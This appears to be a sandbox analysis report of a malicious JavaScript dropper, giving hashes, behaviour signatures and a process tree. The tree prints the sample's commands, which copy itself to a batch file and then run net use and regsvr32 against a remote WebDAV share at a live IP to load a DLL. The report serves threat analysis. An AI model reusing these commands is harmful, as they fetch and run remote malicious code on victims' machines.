Analysis
-
max time kernel
119s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
09/07/2024, 03:41
Static task
static1
Behavioral task
behavioral1
Sample
983219531850416586.js
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
983219531850416586.js
Resource
win10v2004-20240704-en
General
-
Target
983219531850416586.js
-
Size
5KB
-
MD5
6954aee6f19b67ee5ac67d962166c496
-
SHA1
1728c0a5a2abce12ebae8f6740e0e9d07fc5be1b
-
SHA256
5868cba1db313aa8470cb32b98a3fb5991001ec4c62a3928ff2126ea828cb9a2
-
SHA512
2380532022cfc86fb8d6347fc2bd319329c71999dca9b8f0e782cad95e3ecfe8340c69d875492bf2ad9b021f9d0eb7ea458fd01984e9e587592d399172d2fcad
-
SSDEEP
96:ZeqLBoCKc5dFpM/QGFpFnWPJ3R1NZwJYm8I9OXGFtyXps9cxGsG+22cxcJTcqcYy:ZeeoC/zpcQ+pFnKd3wJY/uXyZKcxc+d+
Malware Config
Signatures
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2496 regsvr32.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2664 2708 wscript.exe 30 PID 2708 wrote to memory of 2664 2708 wscript.exe 30 PID 2708 wrote to memory of 2664 2708 wscript.exe 30 PID 2664 wrote to memory of 2508 2664 cmd.exe 32 PID 2664 wrote to memory of 2508 2664 cmd.exe 32 PID 2664 wrote to memory of 2508 2664 cmd.exe 32 PID 2664 wrote to memory of 2496 2664 cmd.exe 33 PID 2664 wrote to memory of 2496 2664 cmd.exe 33 PID 2664 wrote to memory of 2496 2664 cmd.exe 33 PID 2664 wrote to memory of 2496 2664 cmd.exe 33 PID 2664 wrote to memory of 2496 2664 cmd.exe 33
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\983219531850416586.js1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\983219531850416586.js" "C:\Users\Admin\\avlicd.bat" && "C:\Users\Admin\\avlicd.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:2664 -
C:\Windows\system32\net.exenet use \\45.9.74.13@8888\DavWWWRoot\3⤵PID:2508
-
-
C:\Windows\system32\regsvr32.exeregsvr32 /s \\45.9.74.13@8888\DavWWWRoot\39.dll3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2496
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD56954aee6f19b67ee5ac67d962166c496
SHA11728c0a5a2abce12ebae8f6740e0e9d07fc5be1b
SHA2565868cba1db313aa8470cb32b98a3fb5991001ec4c62a3928ff2126ea828cb9a2
SHA5122380532022cfc86fb8d6347fc2bd319329c71999dca9b8f0e782cad95e3ecfe8340c69d875492bf2ad9b021f9d0eb7ea458fd01984e9e587592d399172d2fcad